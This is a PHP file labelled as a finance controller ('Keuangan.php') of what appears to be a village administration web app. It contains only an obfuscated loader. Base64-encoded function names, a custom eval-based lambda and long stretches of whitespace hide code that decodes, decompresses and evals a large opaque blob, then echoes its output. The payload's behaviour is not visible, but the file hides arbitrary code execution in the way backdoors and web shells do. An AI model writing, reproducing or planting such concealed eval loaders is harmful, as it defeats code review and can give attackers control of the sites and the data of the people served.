<?php 
        $__='printf';$_='Loading donjo-app/controllers/Keuangan.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
